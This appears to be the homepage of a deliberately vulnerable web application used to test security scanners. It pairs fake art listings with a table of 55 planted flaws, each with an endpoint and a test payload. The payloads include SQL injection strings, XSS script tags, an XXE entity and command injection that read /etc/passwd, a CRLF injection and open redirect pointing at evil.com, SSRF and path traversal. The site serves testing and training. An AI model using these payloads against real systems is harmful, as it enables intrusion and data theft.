Welcome to Acunetix Art
Test site for Acunetix WVS. Browse our collection of fine art from world-renowned artists.
Search art
Quick Links
Featured Products
Forest Cathedral
Moss-covered ancient trees in Pacific Northwest rainforest. Misty atmosphere with shafts of sunlight.
$569.99
View DetailsOsaka Graffiti
Street art documentation from Osaka's creative districts. Bold colors meeting traditional Japanese aesthetics.
$319.99
View DetailsFractal Universe
Digital abstract exploring fractal geometry and cosmic patterns. Deep space colors with intricate detail.
$399.99
View DetailsNeon Streets
Night photography of Tokyo Shibuya crossing. Long exposure capturing light trails and neon signs.
$479.99
View DetailsVulnerability Demo Pages
| # | Vulnerability | OWASP Category | Link | Test Payload |
|---|---|---|---|---|
| 1 | SQL Injection (Error-based) | A03:Injection | artists.php?artist=1 | 1 OR 1=1 |
| 2 | SQL Injection (Error-based) | A03:Injection | listproducts.php?cat=1 | 1 UNION SELECT 1,2,3,4,5,6 |
| 3 | SQL Injection (Error-based) | A03:Injection | product.php?pic=1 | 1 AND 1=2 UNION SELECT... |
| 4 | Blind SQL Injection | A03:Injection | search.php | ' OR '1'='1 |
| 5 | SQLi Auth Bypass | A03:Injection | login.php | ' OR '1'='1 as user |
| 6 | Second-Order SQLi | A03:Injection | newuser.php | Select stored payload later |
| 7 | SQL Injection (AJAX) | A03:Injection | AJAX/infocateg.php?id=1 | 1 UNION SELECT... |
| 8 | SQL Injection (ModRewrite) | A03:Injection | shop/details.php?id=1 | 1 OR 1=1 |
| 9 | SQLi via API | A03:Injection | api.php?endpoint=users | 1 UNION SELECT... |
| 10 | SQLi via IP Spoofing | A03:Injection | ip.php?query= | Set X-Forwarded-For: 127.0.0.1 |
| 11 | Reflected XSS | A03:Injection | listproducts.php?cat= | <script>alert(1)</script> |
| 12 | Reflected XSS | A03:Injection | search.php | <script>alert(document.cookie)</script> |
| 13 | Reflected XSS (HPP) | A03:Injection | hpp/params.php?p= | <script>alert(1)</script> |
| 14 | Reflected XSS (XFF) | A03:Injection | domxss.php?name= | <img src=x onerror=alert(1)> |
| 15 | Stored XSS | A03:Injection | guestbook.php | <script>alert(1)</script> as name |
| 16 | DOM-based XSS | A03:Injection | domxss.php | Client-side innerHTML |
| 17 | XSS via Open Redirect | A03:Injection | redirect.php | javascript:alert(1) |
| 18 | XML External Entity (XXE) | A03:Injection | xml.php | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| 19 | PHP Eval Injection (SSTI) | A03:Injection | eval.php?code= | system('id') |
| 20 | Command Injection | A03:Injection | server.php?cmd= | id, cat /etc/passwd |
| 21 | LDAP Injection (Sim) | A03:Injection | ldap.php?username= | * wildcard |
| 22 | Email/CRLF Injection | A03:Injection | contact.php | %0d%0aCc: attacker@evil.com |
| 23 | Log Injection → RCE | A03:Injection | logpoison.php | Inject PHP in User-Agent |
| 24 | PHP Deserialization | A08:Software | unserialize.php | Base64 serialized PHP object |
| 25 | Type Juggling (Magic Hash) | A08:Software | hash.php?pass= | 240610708 (0e...) |
| 26 | Type Juggling (Loose Comp) | A08:Software | hash.php?a=true&b=1 | true == 1 |
| 27 | Mass Assignment | A01:BrokenAC | assigned.php | Inject extra POST fields |
| 28 | IDOR | A01:BrokenAC | userinfo.php | Query other users' data |
| 29 | Credit Card Disclosure | A04:Design | Login as test/test | CC visible in profile |
| 30 | Insecure Password Reset | A07:Identity | forgot.php | Token disclosure |
| 31 | Session Fixation | A07:Identity | session.php | Set session ID via URL |
| 32 | Weak Credentials | A07:Identity | login.php | test/test |
| 33 | Auth Bypass (Verb Tampering) | A01:BrokenAC | verb.php | Use POST instead of GET |
| 34 | Open Redirect | A01:BrokenAC | redirect.php | http://evil.com |
| 35 | LFI / Path Traversal | A01:BrokenAC | showimage.php | ../../../etc/passwd |
| 36 | PHP Filter Wrapper | A01:BrokenAC | showimage.php (filter) | php://filter/... |
| 37 | SSRF | A10:SSRF | showimage.php (SSRF) | http://127.0.0.1:22 |
| 38 | Null Byte Injection | A03:Injection | nullbyte.php | config.php%00.jpg |
| 39 | Arbitrary File Upload | A01:BrokenAC | upload.php | Upload PHP shell → RCE |
| 40 | Path Traversal (Download) | A01:BrokenAC | download.php?file= | ../config.php |
| 41 | SSI / Template Injection | A03:Injection | ssi.php | Create file + include |
| 42 | Host Header Injection | A05:Security | server.php | Modify Host header |
| 43 | IP Spoofing (XFF Trust) | A01:BrokenAC | ip.php | X-Forwarded-For: 127.0.0.1 |
| 44 | HTTP Parameter Pollution | A03:Injection | hpp/index.php | Duplicate params |
| 45 | Insecure CORS | A05:Security | api.php | Access-Control-Allow-Origin: * |
| 46 | Info Disclosure (phpinfo) | A05:Security | phpinfo.php | PHP config leak |
| 47 | Info Disclosure (crossdomain) | A05:Security | crossdomain.xml | Permissive Flash policy |
| 48 | Info Disclosure (VCS leak) | A05:Security | CVS/Root | CVS metadata |
| 49 | Info Disclosure (code leak) | A05:Security | index.zip | Source backup |
| 50 | Directory Listing | A05:Security | /admin/ | Options +Indexes |
| 51 | CSRF (No Tokens) | A01:BrokenAC | guestbook.php | All forms CSRF-free |
| 52 | Clickjacking | A05:Security | Entire site | No X-Frame-Options |
| 53 | No HttpOnly/Secure Flag | A05:Security | session.php | Cookie flags missing |
| 54 | Log Disclosure | A05:Security | logpoison.php | Logs readable via LFI |
| 55 | No Rate Limiting | A04:Design | Entire site | Brute force enabled |
Links
- Mod Rewrite Shop
- HTTP Parameter Pollution
- PHP Version Info
- Image Viewer (LFI test)
- Forgot Password (Insecure Reset)
- Contact (Email Injection)
- Server Info (Command Injection)
- File Upload (Shell Upload)
- PHP Unserialize
- Download (Path Traversal)
- XML Parser (XXE)
- PHP Eval (RCE)
- Type Juggling
- IP Spoofing
- REST API
- Mass Assignment
- Session Fixation
- Verb Tampering
- Null Byte Injection
- Log Poisoning
- SSI / Template Injection
- LDAP Injection Simulator
- DOM XSS